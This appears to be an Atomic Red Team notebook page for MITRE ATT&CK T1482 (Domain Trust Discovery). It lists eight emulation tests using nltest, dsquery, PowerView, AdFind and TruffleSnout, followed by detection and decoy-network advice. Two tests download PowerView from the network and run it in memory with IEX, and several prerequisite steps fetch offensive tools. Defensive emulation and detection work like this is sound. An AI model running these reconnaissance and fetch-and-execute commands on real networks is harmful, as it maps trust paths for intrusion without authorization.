# T1482 - Domain Trust Discovery
Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)

## Atomic Tests

### Atomic Test #1 - Windows - Discover domain trusts with dsqueryUses the dsquery command to discover domain trusts.
Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
dsquery * -filter "(objectClass=trustedDomain)" -attr *
```

In [ ]:
Invoke-AtomicTest T1482 -TestNumbers 1

### Atomic Test #2 - Windows - Discover domain trusts with nltest
Uses the nltest command to discover domain trusts.
Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role.
This technique has been used by the Trickbot malware family.

**Supported Platforms:** windows
#### Dependencies:  Run with `command_prompt`!
##### Description: nltest.exe from RSAT must be present on disk

##### Check Prereq Commands:
```cmd
WHERE nltest.exe >NUL 2>&1

```
##### Get Prereq Commands:
```cmd
echo Sorry RSAT must be installed manually

```

In [ ]:
Invoke-AtomicTest T1482 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
nltest /domain_trusts
nltest /trusted_domains
```

In [ ]:
Invoke-AtomicTest T1482 -TestNumbers 2

### Atomic Test #3 - Powershell enumerate domains and forests
Use powershell to enumerate AD information.
Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: PowerView PowerShell script must exist on disk

##### Check Prereq Commands:
```powershell
if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1"

```
##### Description: RSAT PowerShell AD admin cmdlets must be installed

##### Check Prereq Commands:
```powershell
if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "Sorry RSAT must be installed manually"

```

In [ ]:
Invoke-AtomicTest T1482 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module "$env:TEMP\PowerView.ps1"
Get-NetDomainTrust
Get-NetForestTrust
Get-ADDomain
Get-ADGroupMember Administrators -Recursive
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
```

In [ ]:
Invoke-AtomicTest T1482 -TestNumbers 3

### Atomic Test #4 - Adfind - Enumerate Active Directory OUs
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})

##### Check Prereq Commands:
```cmd
if (Test-Path PathToAtomicsFolder\T1087.002\src\AdFind.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile PathToAtomicsFolder\T1087.002\src\AdFind.exe

```

In [ ]:
Invoke-AtomicTest T1482 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
PathToAtomicsFolder\T1087.002\src\AdFind.exe -f (objectcategory=organizationalUnit)
```

In [ ]:
Invoke-AtomicTest T1482 -TestNumbers 4

### Atomic Test #5 - Adfind - Enumerate Active Directory Trusts
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})

##### Check Prereq Commands:
```cmd
if (Test-Path PathToAtomicsFolder\T1087.002\src\AdFind.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile PathToAtomicsFolder\T1087.002\src\AdFind.exe

```

In [ ]:
Invoke-AtomicTest T1482 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
PathToAtomicsFolder\T1087.002\src\AdFind.exe -gcb -sc trustdmp
```

In [ ]:
Invoke-AtomicTest T1482 -TestNumbers 5

### Atomic Test #6 - Get-DomainTrust with PowerViewUtilizing PowerView, run Get-DomainTrust to identify domain trusts. Upon execution, progress and info about trusts within the domain being scanned will be displayed.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainTrust -Verbose
```

In [ ]:
Invoke-AtomicTest T1482 -TestNumbers 6

### Atomic Test #7 - Get-ForestTrust with PowerViewUtilizing PowerView, run Get-ForestTrust to identify forest trusts. Upon execution, progress and info about forest trusts within the domain being scanned will be displayed.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-ForestTrust -Verbose
```

In [ ]:
Invoke-AtomicTest T1482 -TestNumbers 7

### Atomic Test #8 - TruffleSnout - Listing AD Infrastructure
Iterative AD discovery toolkit for offensive operators. Situational awareness and targeted low noise enumeration. Preference for OpSec.- https://github.com/dsnezhkov/TruffleSnout

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: TruffleSnout.exe must exist on disk at specified location (#{trufflesnout_path})

##### Check Prereq Commands:
```cmd
if (Test-Path PathToAtomicsFolder\T1482\src\TruffleSnout.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -ItemType Directory (Split-Path PathToAtomicsFolder\T1482\src\TruffleSnout.exe) -Force | Out-Null
Invoke-WebRequest -Uri "https://github.com/dsnezhkov/TruffleSnout/releases/download/0.5/TruffleSnout.exe" -OutFile PathToAtomicsFolder\T1482\src\TruffleSnout.exe

```

In [ ]:
Invoke-AtomicTest T1482 -TestNumbers 8 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
PathToAtomicsFolder\T1482\src\TruffleSnout.exe forest -n %userdomain%
PathToAtomicsFolder\T1482\src\TruffleSnout.exe domain -n %userdomain%
```

In [ ]:
Invoke-AtomicTest T1482 -TestNumbers 8

## Detection
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation but as part of a chain of behavior that could lead to other activities based on the information obtained.

Monitor processes and command-line arguments for actions that could be taken to gather system and network information, such as `nltest /domain_trusts`. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the `DSEnumerateDomainTrusts()` Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). The .NET method `GetAllTrustRelationships()` can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)



## Shield Active Defense
### Decoy Network 
 Create a target network with a set of target systems, for the purpose of active defense.
 

 Decoy networks are comprised of multiple computing resources that can be used for defensive or deceptive purposes.  A decoy network can be used to safely perform dynamic analysis of suspected malicious code. A defender can also use a specially crafted decoy network to perform adversary engagement. 
#### Opportunity
There is an opportunity to extend an adversary's engagement period by creating a decoy network that systems can discover when performing trust discovery.
#### Use Case
A defender can create a decoy network that contains systems which are easily discoverable and appealing to an adversary.
#### Procedures
Create an isolated network populated with decoy systems that can be used to study an adversary's tactics, techniques, and procedures (TTPs).
Use a segregated network to visit a compromised site.  If the machine becomes infected, allow the machine to remain on with internet access to see if an adversary engages and takes action on the system.
